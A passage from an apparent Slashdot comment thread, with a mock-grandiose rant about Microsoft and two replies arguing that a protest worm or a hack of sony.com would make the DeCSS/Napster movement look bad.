    This is good. This is fun. It is good that we are all here to hash this out. To make sense of this, to exercise our mighty muscles of invective and investigation. We are spinning away at the wheel of truth, cobbing webs of vision and genecity from simple strands of plaint.

    Microsoft doth vex us so, in its huge and omnivorous, yet soft, ware-arms. We tumble restlessly in marketing induced dreams, waking fraily, faintly to calls of life and freedom, but never rousing fully. For the beast is huge and surrounding and fighting on every front seemingly invisible foes is sure to grant one special lodging in the House of Crank.

    You and I brother, sister, we stumble forth into this digital-electro future knowing fully its past, seeing the lessons hidden from the teeming hordes of TV surfers.

    We shall be banished, ridiculed and, in the end, reeducated.

    MjM

  162. Re:I don't think a virus/worm is the right way to by Alley+Viper · · Score: 1

    This is exactly what I said about the notion that someone hack into sony.com as a result of that VP's crazy Napster comments... While I wouldn't be surprised if someone does it, and would get a chuckle out of it, the mainstream media will immediately paint the people creating this worm, even if it has no malicious behavior whatsoever will paint the authors as big bad scary hackers, thereby making the entire DeCSS/Napster/whatever movement look like a bunch of scruffy-faced anarchistic teens who need to be put it line.

  163. Re:I don't think a virus/worm is the right way to by Alley+Viper · · Score: 1
    I just realized that I made numerous grammatical errors in that last reply, as well as writing a sentence too damn long for its own good.

    One more good reason to actually look at the preview.